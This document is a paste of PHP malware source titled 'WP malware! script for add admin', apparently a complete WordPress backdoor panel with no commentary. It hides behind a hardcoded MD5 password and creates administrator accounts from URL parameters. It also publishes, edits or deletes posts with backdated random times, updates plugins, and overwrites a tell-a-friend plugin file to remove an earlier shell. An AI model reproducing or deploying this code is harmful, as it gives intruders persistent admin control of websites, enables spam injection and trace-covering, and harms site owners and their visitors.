WP malware! script for add admin

1. <?php
2. //Don't try this at home
3.  
4. header('Content-Type:text/html; charset=UTF-8');
5.  
6. @set_time_limit(0);
7.  
8. define('PASSWORD_FILE', 'p.txt');
9.  
10. if(!empty($_GET['action']) && $_GET['action'] == 'set_password' && !empty($_GET['hashed_password'])) {
11.     $hashed_password = $_GET['hashed_password'];
12.     $fh = fopen(PASSWORD_FILE, "w");
13.     if($fh==false) die("unable to create file");
14.     fputs ($fh, $hashed_password);
15.     fclose ($fh);
16.     exit;
17. }
18.  
19. if(!file_exists(PASSWORD_FILE)) {
20.     $hashed_password = 'a6a8cb877ee18215f2c0fc2a6c7b4f2a';
21.     $fh = fopen(PASSWORD_FILE, "w");
22.     if($fh==false) die("unable to create file");
23.     fputs ($fh, $hashed_password);
24.     fclose ($fh);
25. }
26. else {
27.     $hashed_password = trim(file_get_contents(PASSWORD_FILE));
28. }
29.  
30. define('SHELL_PASSWORD', $hashed_password);
31. define('MAX_UP_LEVELS', 10);
32.  
33. if(empty($_COOKIE['password']) && empty($_POST['password']) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
34.     print '<form method="post">Password : <input type="text" name="password"><input type="submit"></form>';
35. }
36.  
37. if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
38.     setcookie('password', SHELL_PASSWORD, time()+60*60*24);
39.     header("Location: {$_SERVER['PHP_SELF']}");
40.     exit;
41. }
42.  
43. if(empty($_COOKIE['password']) || $_COOKIE['password'] != SHELL_PASSWORD) {
44.     exit;
45. }
46.  
47. $counter = 0;
48. $dir_up = './';
49. do {
50.     $file_found = false;
51.     $file_path = "{$dir_up}wp-load.php";
52.     if(file_exists($file_path)) {
53.         require($file_path);
54.         $file_found = true;
55.     }
56.     else {
57.         $dir_up .= '../';
58.     }
59.     $counter++;
60. }while(!$file_found && $counter < MAX_UP_LEVELS);
61.  
62. if(isset($_GET['action']) && $_GET['action'] == 'create_user') {
63. if(empty($_GET['username']) || empty($_GET['password']) || empty($_GET['email'])){
64. print "Missing parameter for creating user!";
65. exit;
66. }
67. else {
68. $userdata = array('user_login' => $_GET['username'], 'user_pass' => $_GET['password'], 'user_email' => $_GET['email'], 'role' => 'administrator');
69. $user_id = wp_insert_user( $userdata );
70. if(is_numeric($user_id)) {
71. print "User has been created.<br>Login: {$_GET['username']} Password: {$_GET['password']}<br>";
72. print '<a href="'.wp_login_url().'" title="Login" target="_blank">Login</a><br>';
73. }
74. }
75. }
76.  
77. if(!empty($_POST['title']) && !empty($_POST['post'])) {
78.     $post_date = $_POST['datepicker'] . " " . rand(0,23) . ":" . rand(0,59) . ":" . rand(0,59);
79.  
80.     // Create post object
81.     $my_post = array(
82.       'post_title'    => $_POST['title'],
83.       'post_content'  => $_POST['post'],
84.       'post_status'   => 'publish',
85.       'post_author'   => 1,
86.       'post_type' => $_POST['post_type'],
87.       'post_date'     => $post_date
88.     );
89.     $id = NULL;
90.     if(empty($_POST['ID'])) {
91.         // Insert the post into the database
92.         $id = wp_insert_post($my_post);
93.     }
94.     else {
95.             if($_POST['delete_post'] == 1) {
96.                 $del_op_res = wp_delete_post( $_POST['ID'], true );
97.                 if(!$del_op_res) print "Delete failed!<br>\n";
98.             }
99.             else {
100.                 $my_post['ID'] = $_POST['ID'];
101.                 $id = wp_update_post($my_post);
102.             }
103.     }
104.     $permalink = get_permalink( $id );
105.     wp_set_post_categories($id, array($_POST['cat']));
106.     if($_POST['delete_post'] != 1) {
107.         if(!empty($id)) {
108.             $post = get_post($id);
109.             print "<a href=\"{$permalink}\" target=\"blank\">View post by permalink</a>&nbsp;<a href=\"{$post->guid}\" target=\"blank\">View post/page by id</a>";
110.         }
111.         else {
112.             print "Action failed!<br>\n";
113.         }
114.     }
115. }
116.  
117. if(!empty($_POST['plugin2update'])) {
118.     include_once( $dir_up . 'wp-admin/includes/class-ftp.php');
119.     include_once( $dir_up . 'wp-admin/includes/update.php');
120.     include_once( $dir_up . 'wp-admin/includes/file.php');
121.     include_once( $dir_up . 'wp-admin/includes/screen.php');
122.     include_once( $dir_up . 'wp-admin/includes/misc.php');
123.     include_once( $dir_up . 'wp-admin/includes/plugin.php');
124.    
125.     foreach($_POST['plugin2update'] as $plugin) {
126.         print "$plugin update : ";
127.         wp_update_plugin($plugin);
128.     }
129.    
130.     exit;
131. }
132.  
133. if(!empty($_POST['file2clean'])) {
134. $tell_a_friend_content = '<?php
135. /*
136. Plugin Name: Tell a Friend
137. Version: 0.1
138. Plugin URI: http://www.freetellafriend.com/get_button/
139. Description: Adds a \'Share This Post\' button after each post. The service which is used is freetellafriend.com which supports e-mail address book, social bookmarks and favorites.
140. Author: FreeTellaFriend
141. Author URI: http://www.freetellafriend.com/
142. */
143.  
144. function tell_a_friend($content) {
145. global $post;
146. $taf_permlink = urlencode(get_permalink($post->ID));
147. $taf_title = urlencode(get_the_title($post->ID) );
148. $taf_img = get_settings(\'home\') . \'/wp-content/plugins/tell-a-friend/button.gif\';
149.  
150.     if ( !is_feed() && !is_page() ) {
151.     $content .= \'<a href="https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'" onclick="window.open(\'https://www.freetellafriend.com/tell/?url=\'.$taf_permlink.\'&title=\'.$taf_title.\'\', \'freetellafriend\', \'scrollbars=1,menubar=0,width=617,height=530,resizable=1,toolbar=0,location=0,status=0,screenX=210,screenY=100,left=210,top=100\'); return false;" target="_blank" title="Share This Post"><img src="\'.$taf_img.\'" style="width:127px;height:16px;border:0px;" alt="Share This Post" title="Share This Post" /></a>\';               
152.     }
153.  
154. return $content;
155. }
156.  
157. add_filter(\'the_content\', \'tell_a_friend\');
158.  
159. ?>';
160.  
161.     if(file_exists($_POST['file2clean'])) {
162.         if(strpos($_POST['file2clean'], 'tell-a-friend.php') !== false) {
163.             if(file_put_contents($_POST['file2clean'], $tell_a_friend_content)) {
164.                 print "File {$_POST['file2clean']} has been cleaned.";
165.             }
166.             else {
167.                 print "Failed cleaning {$_POST['file2clean']} !";
168.             }
169.         }
170.     }
171. }
172. ?>
173. <html lang="en">
174. <head>
175.   <meta charset="utf-8" />
176.   <title>WP posts editor</title>
177.   <link rel="stylesheet" href="http://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css" />
178.   <script src="http://code.jquery.com/jquery-1.9.1.js"></script>
179.   <script src="http://code.jquery.com/ui/1.10.3/jquery-ui.js"></script>
180.   <link rel="stylesheet" href="/resources/demos/style.css" />
181.   <script src="https://cloud.tinymce.com/stable/tinymce.min.js"></script>
182.   <script>
183.   tinymce.init({
184.   selector: 'textarea',
185.   height: 500,
186.   theme: 'modern',
187.   plugins: [
188.     'advlist autolink lists link image charmap print preview hr anchor pagebreak',
189.     'searchreplace wordcount visualblocks visualchars code',
190.     'insertdatetime media nonbreaking save table contextmenu directionality',
191.     'paste textcolor colorpicker textpattern imagetools codesample toc help'
192.   ],
193.   toolbar1: 'undo redo | insert | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image',
194.   toolbar2: 'print preview media | forecolor backcolor | codesample help',
195.   image_advtab: true,
196.   content_css: [
197.     '//fonts.googleapis.com/css?family=Lato:300,300i,400,400i',
198.     '//www.tinymce.com/css/codepen.min.css'
199.   ]
200.  });
201.   </script>
202.   <script>
203.   $(function() {
204.     $( "#datepicker" ).datepicker({
205.       changeMonth: true,
206.       changeYear: true,
207.       dateFormat: "yy-mm-dd"
208.     });
209.   });
210.  
211.   function go(form_obj) {
212.     for(var i=0;i<form_obj.elements.length;i++) {
213.         if(form_obj.elements[i].type == "checkbox") {
214.             form_obj.elements[i].disabled = false;
215.             form_obj.elements[i].checked = true;
216.             form_obj.target = "window" + i;
217.             form_obj.submit();
218.             form_obj.elements[i].disabled = true;
219.             form_obj.elements[i].checked = false;
220.         }
221.     }
222.   }
223.   </script>
224. </head>
225. <body>
226. <?php print $message; ?>
227. <form method="post">
228. <fieldset legend="Update plugins">
229. <?php
230.     include_once($dir_up . 'wp-admin/includes/plugin.php');
231.        
232.     $plugins = get_plugins();
233.     foreach (array_keys($plugins)  as $plugin ) {
234.         echo "<li><input type=\"checkbox\" name=\"plugin2update[]\" value=\"$plugin\" disabled>$plugin</li>\n";
235.         $counter++;
236.     }
237. ?>
238. <input type="button" value="Update plugins" onclick="go(this.form)">
239. </fieldset>
240. </form>
241.  
242. <form method="post">
243. <fieldset>
244. Remove shell from file : <select name="file2clean">
245. <option value="<?php print $dir_up . 'wp-content/plugins/tell-a-friend/tell-a-friend.php'; ?>">tell-a-friend.php</option>
246. </select>
247. <input type="submit">
248. </fieldset>
249. </form>
250.  
251. <form>
252. <fieldset legend="Create user">
253. Username: <input type="text" name="username"><br>
254. Password: <input type="text" name="password"><br>
255. E-mail: <input type="text" name="email"><br>
256. <input type="hidden" name="action" value="create_user">
257. <input type="submit" value="Create user">
258. </fieldset>
259. </form>
260. <hr>
261. <h1>Add/Edit posts</h1>
262. <?php
263. $post = NULL;
264. if(!empty($_GET['post_url2search'])) {
265.     $the_slug = str_replace('/', '', $_GET['post_url2search']);
266.     $args = array(
267.         'name' => $the_slug,
268.         'post_status' => 'publish',
269.         'posts_per_page' => 1
270.     );
271.     $my_posts = get_posts( $args );
272.  
273.     if(!empty($my_posts[0]->ID) && is_numeric($my_posts[0]->ID)) {
274.         $post = get_post($my_posts[0]->ID);
275.     }
276. }
277.  
278. if(!empty($_GET['page_id'])) {
279.     $post = get_page($_GET['page_id']);
280. }
281. ?>
282.  
283. <form method="post" action="<?php print $_SERVER['PHP_SELF']; ?>">
284. Title: <input type="text" name="title" size="100" value="<?php if(!empty($post->post_title)) print $post->post_title; ?>">
285. <br>
286. Post: <textarea name="post" rows="30" cols="100"><?php if(!empty($post->post_content)) print $post->post_content; ?></textarea>
287. <br>
288. Date: <input type="text" name="datepicker" id="datepicker" value="<?php if(!empty($post->post_date)) print $post->post_date; ?>">
289. <br>
290. Category: <?php
291. if(!empty($my_posts[0]->ID)) {
292.     $sel_cat = array_shift(wp_get_post_categories($my_posts[0]->ID));
293. }
294. else {
295.     $sel_cat = 0;
296. }
297.  
298. $args = array(
299.     'show_option_all'    => '',
300.     'show_option_none'   => '',
301.     'orderby'            => 'ID',
302.     'order'              => 'ASC',
303.     'show_count'         => 1,
304.     'hide_empty'         => 1,
305.     'child_of'           => 0,
306.     'exclude'            => '',
307.     'echo'               => 1,
308.     'selected'           => $sel_cat,
309.     'hierarchical'       => 0,
310.     'name'               => 'cat',
311.     'id'                 => '',
312.     'class'              => 'postform',
313.     'depth'              => 0,
314.     'tab_index'          => 0,
315.     'taxonomy'           => 'category',
316.     'hide_if_empty'      => false,
317.     'walker'             => ''
318. );
319. wp_dropdown_categories( $args );
320. ?>
321. Post type: <input type="radio" name="post_type" value="post" <?php if((!empty($post->post_type) && $post->post_type == 'post') || (empty($post->post_type))) print 'checked'; ?>>Post
322. <input type="radio" name="post_type" value="page" <?php if(!empty($post->post_type) && $post->post_type == 'page') print 'checked'; ?>>Page<br>
323. <input type="hidden" name="ID" value="<?php if(!empty($post->ID)) print $post->ID; ?>">
324. <input type="submit" value="Insert/Update post">
325. <input type="hidden" name="delete_post" value="">
326. <input type="button" value="Delete post" onclick="if(confirm('Delete this post?')) {this.form.delete_post.value=1;this.form.submit();}">
327. </form>
328.  
329. <br>
330. <hr>
331. <h1>Edit posts</h1>
332. <br>
333. <form method="get">
334. Post URL : <input type="text" name="post_url2search" size="100">
335. <input type="submit" value="FIND AND EDIT">
336. </form>
337.  
338. <form method="get">
339. Edit page: <?php wp_dropdown_pages(); ?>
340. <input type="submit">
341. </form>
342.  
343.  
344. <br><br><br>
345. Categories view:<br>
346. <?php
347. $args = array(
348.     'type'                     => 'post',
349.     'child_of'                 => 0,
350.     'parent'                   => '',
351.     'orderby'                  => 'name',
352.     'order'                    => 'ASC',
353.     'hide_empty'               => 1,
354.     'hierarchical'             => 1,
355.     'exclude'                  => '',
356.     'include'                  => '',
357.     'number'                   => '',
358.     'taxonomy'                 => 'category',
359.     'pad_counts'               => false );
360.  
361. $categories = get_categories( $args );
362. foreach ($categories as $category) {
363.     echo "<a href=\"".get_site_url()."/category/{$category->slug}\" target=\"_blank\">{$category->cat_name}</a><br>\n";
364. }
365. ?>
366. </body>
367. </html>